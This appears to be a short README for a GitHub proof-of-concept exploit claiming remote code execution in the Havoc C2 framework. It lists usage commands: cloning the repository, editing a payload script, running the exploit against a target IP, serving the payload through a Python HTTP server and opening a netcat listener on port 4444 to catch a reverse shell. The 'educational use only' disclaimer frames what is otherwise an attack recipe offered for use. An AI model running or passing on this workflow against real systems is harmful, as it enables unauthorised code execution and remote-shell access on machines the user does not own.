A proof-of-concept (PoC) click here
This repository contains a proof-of-concept (PoC) exploit for a Remote Code Execution (RCE) vulnerability discovered in Havoc C2 in 2024. The exploit demonstrates how an attacker could potentially execute arbitrary code on a target system running a vulnerable version of Havoc C2.
Note: This project is intended for educational and research purposes only. Do not use this code for malicious purposes.
To use this PoC, follow these steps:
- Clone the repository:
git clone https://github.com/dxlerYT/Havoc-C2-RCE-2024.git cd Havoc-C2-RCE-2024 Edit payload.sh sudo python3 exploit.py --target https://$IP -i 127.0.0.1 -p 40056 python3 -m http.server 8000 nc -nvlp 4444